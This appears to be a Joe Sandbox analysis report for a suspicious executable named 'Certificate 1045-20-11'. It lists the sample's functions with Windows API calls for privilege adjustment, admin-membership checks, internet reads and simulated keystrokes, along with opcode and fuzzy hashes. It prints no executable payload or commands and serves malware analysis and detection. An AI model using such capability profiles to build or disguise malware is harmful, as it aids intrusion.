                                                                                • Opcode ID: 007f0153846493fd74597af4d71bb07a3901a8e41205f56184d12544c64ef46b
                                                                                • Instruction ID: 5043a47d52962d7da77872480fd19ec684b27a03308942ae9492c7667d625d67
                                                                                • Opcode Fuzzy Hash: 007f0153846493fd74597af4d71bb07a3901a8e41205f56184d12544c64ef46b
                                                                                • Instruction Fuzzy Hash: EC116D31700615ABF7216F2A9C84E6EBBA9FF96761B044429F84AD7241CF70E90286A5
                                                                                Function 00849B60 Relevance: 7.3, Strings: 5, Instructions: 1055COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                • API String ID: 0-1546025612
                                                                                • Opcode ID: 194c99860d82cad1217a096b383e27388f8f7fc0d4a923c932cdef9fd6a12d30
                                                                                • Instruction ID: e432ce3c16d10ee2c8e3ce6dad9b42c5b7de17f64842388d90ebc384c2f80bb4
                                                                                • Opcode Fuzzy Hash: 194c99860d82cad1217a096b383e27388f8f7fc0d4a923c932cdef9fd6a12d30
                                                                                • Instruction Fuzzy Hash: DB926C71A0061ECBDF28CF58C881BAEB7B1FB54314F14819AE85AEB280D771DD85DB91
                                                                                Function 0085E01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,0085E014,74DF0AE0,0085DEF1,008DDC38,?,?), ref: 0085E02C
                                                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0085E03E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                • API String ID: 2574300362-192647395
                                                                                • Opcode ID: 1d806b0dcd1a51a7140a5715d8ad98b33577ae7eadfc0570f141acf2c5aceda1
                                                                                • Instruction ID: 0cda822e303dc8d86eec211e00509cc56f3f230590c8cb4fa8e1893d3d497d51
                                                                                • Opcode Fuzzy Hash: 1d806b0dcd1a51a7140a5715d8ad98b33577ae7eadfc0570f141acf2c5aceda1
                                                                                • Instruction Fuzzy Hash: 63D0A735800B129FC7355F70EC08A32B6E4FB00311F2C842AE891D2690D7B8C8848650
                                                                                Function 008813CA Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 008813DC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen
                                                                                • String ID: ($|
                                                                                • API String ID: 1659193697-1631851259
                                                                                • Opcode ID: 210edf8180ab26c3760c6be0f9eed1448752d733ddb0f4bd22b087a66b366535
                                                                                • Instruction ID: 0b58cf2c89cfa6a9a259be89cbced2c1f43c479f651c750cea02a1028c8733ec
                                                                                • Opcode Fuzzy Hash: 210edf8180ab26c3760c6be0f9eed1448752d733ddb0f4bd22b087a66b366535
                                                                                • Instruction Fuzzy Hash: 43323775A007059FCB28DF69C48496AB7F5FF48310B11C46EE59ADB3A1DB70E982CB44
                                                                                Function 0085B11F Relevance: 4.9, APIs: 3, Instructions: 377COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0085B34E: GetWindowLongW.USER32(?,000000EB), ref: 0085B35F
                                                                                • DefDlgProcW.USER32(?,?,?,?,?), ref: 0085B22F
                                                                                  • Part of subcall function 0085B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0085B5A5
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Proc$LongWindow
                                                                                • String ID:
                                                                                • API String ID: 2749884682-0
                                                                                • Opcode ID: c0b071a2e8466cd75a785637a3f28b4e703aa11f94414c95f89235906d132fb5
                                                                                • Instruction ID: e7e34767b127633db14e3854f4522053ac51a9535f707a2bf908f6dd5af8a22d
                                                                                • Opcode Fuzzy Hash: c0b071a2e8466cd75a785637a3f28b4e703aa11f94414c95f89235906d132fb5
                                                                                • Instruction Fuzzy Hash: 67A14874114109BEEB386A6D4C89EFF299CFB6636AF10411DFC02D2692DB259C09E673
                                                                                Function 00894EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,008943BF,00000000), ref: 00894FA6
                                                                                • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00894FD2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$AvailableDataFileQueryRead
                                                                                • String ID:
                                                                                • API String ID: 599397726-0
                                                                                • Opcode ID: 5f5c3068de4b4a086d47ef5675c8df7989f8fc6315b498687c29df3a9cd5aac3
                                                                                • Instruction ID: bd499f7e1f7a7e12cd9c97b4c8ca48868826d7a6d507e1d707450c7ecbff958a
                                                                                • Opcode Fuzzy Hash: 5f5c3068de4b4a086d47ef5675c8df7989f8fc6315b498687c29df3a9cd5aac3
                                                                                • Instruction Fuzzy Hash: 5F41F87150460ABFEF21AF94DC85EBF77BCFB40319F14006AF605E6181DA719E429750
                                                                                Function 0088E1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0088E20D
                                                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0088E267
                                                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0088E2B4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode$DiskFreeSpace
                                                                                • String ID:
                                                                                • API String ID: 1682464887-0
                                                                                • Opcode ID: 517d330ac563956b04a2f594f609f912315c79bd300d0c2952dff30f2398d58b
                                                                                • Instruction ID: 47821bc53d95744499e753a3df4268f46e3778dcc3ed344e3c41f89075fd4a60
                                                                                • Opcode Fuzzy Hash: 517d330ac563956b04a2f594f609f912315c79bd300d0c2952dff30f2398d58b
                                                                                • Instruction Fuzzy Hash: C3213D35A00218EFDB00EFA9D885EADFBB8FF49314F0484AAE945EB351DB319915CB51
                                                                                Function 0087B134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0085F4EA: std::exception::exception.LIBCMT ref: 0085F51E
                                                                                  • Part of subcall function 0085F4EA: __CxxThrowException@8.LIBCMT ref: 0085F533
                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0087B180
                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0087B1AD
                                                                                • GetLastError.KERNEL32 ref: 0087B1BA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                • String ID:
                                                                                • API String ID: 1922334811-0
                                                                                • Opcode ID: 92a0c2cace453b9f036920e26b02dd3d181fe99247d6a0bc5706e5a65e1a84e8
                                                                                • Instruction ID: 8f2c08aaa50b6ad576f2fe94f71ff8620aec30edd6cabc826a650946c7991213
                                                                                • Opcode Fuzzy Hash: 92a0c2cace453b9f036920e26b02dd3d181fe99247d6a0bc5706e5a65e1a84e8
                                                                                • Instruction Fuzzy Hash: DF11CEB2400304AFE728AF68DCC5D2BB7BDFF44311B20852EE55A93241EB70FC418A60
                                                                                Function 00886685 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 008866AF
                                                                                • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 008866EC
                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 008866F5
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: CloseControlCreateDeviceFileHandle
                                                                                • String ID:
                                                                                • API String ID: 33631002-0
                                                                                • Opcode ID: 58da384b36f0ffaae0d9c1c751c6357a4d0f2058c1d6a8a657559e2a4a8a92a6
                                                                                • Instruction ID: 20b0e9ffb33cf8b6e78e5d48097f0bdd803ac05826404a5f47448084eb7d6169
                                                                                • Opcode Fuzzy Hash: 58da384b36f0ffaae0d9c1c751c6357a4d0f2058c1d6a8a657559e2a4a8a92a6
                                                                                • Instruction Fuzzy Hash: D11188B2901228BFE711ABA8DC45FAFB7BCFB04754F104656F901E7191D274AE0487E5
                                                                                Function 008871FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00887223
                                                                                • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0088723A
                                                                                • FreeSid.ADVAPI32(?), ref: 0088724A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                • String ID:
                                                                                • API String ID: 3429775523-0
                                                                                • Opcode ID: c539e588a28e9269fa531e16fe112600367d10e7c0d597b2cb2495483d90552a
                                                                                • Instruction ID: 6df81ddc7c43b38b53c8d98de7ad8f07022701b049ea8fe8b9c8fbaebbe81de1
                                                                                • Opcode Fuzzy Hash: c539e588a28e9269fa531e16fe112600367d10e7c0d597b2cb2495483d90552a
                                                                                • Instruction Fuzzy Hash: 33F01275904309BFDF04DFE8DD89EEDBBB8FF08201F104469A502E2191E37096458B10
                                                                                Function 0088F56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0088F599
                                                                                • FindClose.KERNEL32(00000000), ref: 0088F5C9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Find$CloseFileFirst
                                                                                • String ID:
                                                                                • API String ID: 2295610775-0
                                                                                • Opcode ID: da46928ef611cb125535f0f0b3e0d420ac4ab3bee2946582dbe2c5557cf1a5db
                                                                                • Instruction ID: bc7d74b2c460b6127ae0ca174803285716898afe084dc65dd9ed3853011d6027
                                                                                • Opcode Fuzzy Hash: da46928ef611cb125535f0f0b3e0d420ac4ab3bee2946582dbe2c5557cf1a5db
                                                                                • Instruction Fuzzy Hash: 1C11A1316002049FDB10EF28D845A2EF3E8FF85325F04892EF9A6D7291CF30AD048B81
                                                                                Function 0088CE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0089BE6A,?,?,00000000,?), ref: 0088CEA7
                                                                                • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0089BE6A,?,?,00000000,?), ref: 0088CEB9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFormatLastMessage
                                                                                • String ID:
                                                                                • API String ID: 3479602957-0
                                                                                • Opcode ID: 7645eb9ec7e0eeb7329f83cfec250a50facfcc2b91d9ecacbeaf1e64c48bc500
                                                                                • Instruction ID: a869c6346f1f6f7e657d0c886ec35bda16c3fa4c4af3e56c40b784173671fa26
                                                                                • Opcode Fuzzy Hash: 7645eb9ec7e0eeb7329f83cfec250a50facfcc2b91d9ecacbeaf1e64c48bc500
                                                                                • Instruction Fuzzy Hash: 40F08C3110032DABDB20ABA4DC49FEA776DFF083A1F008165F919E6181D730AA40CBA1
                                                                                Function 0088411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00884153
                                                                                • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00884166
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: InputSendkeybd_event
                                                                                • String ID:
                                                                                • API String ID: 3536248340-0
                                                                                • Opcode ID: ae0525b411ec149e0121ac0777a4d2ee997a8235f1460162ff5ba83841224a0c
                                                                                • Instruction ID: 79c767278a3295874ff6289486dd15c3c70dd178acb0c17ee0e1c81d9c9fc2f9
                                                                                • Opcode Fuzzy Hash: ae0525b411ec149e0121ac0777a4d2ee997a8235f1460162ff5ba83841224a0c
                                                                                • Instruction Fuzzy Hash: 59F06D7590034EAFDB059FA0C809BBE7BB0FF00305F008019F96596191D77986129FA0
                                                                                Function 0087AB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0087ACC0), ref: 0087AB99
                                                                                • CloseHandle.KERNEL32(?,?,0087ACC0), ref: 0087ABAB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: AdjustCloseHandlePrivilegesToken
                                                                                • String ID:
                                                                                • API String ID: 81990902-0
                                                                                • Opcode ID: 627a51ba4073d2cca2d8dcd953a5c6d5ea4ebf86c7b67d101561b6428af4ed1e
                                                                                • Instruction ID: 76337eb93c4fa1d0f2df9ef7d8ee86ba96d6d73203c72d2c72231c1db19b472d
                                                                                • Opcode Fuzzy Hash: 627a51ba4073d2cca2d8dcd953a5c6d5ea4ebf86c7b67d101561b6428af4ed1e
                                                                                • Instruction Fuzzy Hash: 2FE0BF72000A10AFE7252F69EC05D76B7A9FB443227108439B959C1471D772AC949B51
                                                                                Function 008681AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00866DB3,-0000031A,?,?,00000001), ref: 008681B1
                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 008681BA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled
                                                                                • String ID:
                                                                                • API String ID: 3192549508-0
                                                                                • Opcode ID: 838dbbcf10260a2bf9e7b5bfd009bcadbdc6178954f4bce21418abad6ea8a3a5
                                                                                • Instruction ID: ecaf942eaa93a5b136916ede07bcf402f0e78cc78782a55ba961c9c2c2985e80
                                                                                • Opcode Fuzzy Hash: 838dbbcf10260a2bf9e7b5bfd009bcadbdc6178954f4bce21418abad6ea8a3a5
                                                                                • Instruction Fuzzy Hash: D7B09231044748ABDB003BB1EC09F587F78FB48656F018021F60D48661AB7254108A92
                                                                                Function 008477B0 Relevance: 2.6, APIs: 1, Instructions: 1076COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: _memmove
                                                                                • String ID:
                                                                                • API String ID: 4104443479-0
                                                                                • Opcode ID: f716d138754001ff8ad251ecf22d1abdcfdf537265233642ef0b4ede0893cfe9
                                                                                • Instruction ID: 4446438429fc96e336f541b0d3b7a5133b12f46439cc94a524f7b43ea3a43094
                                                                                • Opcode Fuzzy Hash: f716d138754001ff8ad251ecf22d1abdcfdf537265233642ef0b4ede0893cfe9
                                                                                • Instruction Fuzzy Hash: A9A22974A04219CFDB24CF58C880BADBBB1FF59314F2581AAD859EB391D7349E81DB90
                                                                                Function 0086D1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d8b1f90e1cc12f1eceddd768b7552c1b9ed8f1b520796986c45787b60ca4ecf9
                                                                                • Instruction ID: 2542da5acc603c6f82790dfb664c41d0271757f86526c0f9bfcd9c01cd3f85bf
                                                                                • Opcode Fuzzy Hash: d8b1f90e1cc12f1eceddd768b7552c1b9ed8f1b520796986c45787b60ca4ecf9
                                                                                • Instruction Fuzzy Hash: E0320222E29F414DD7239635C822335A799FFB73D4F16D737E819B5AAAEB28C4835100
                                                                                Function 008496C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
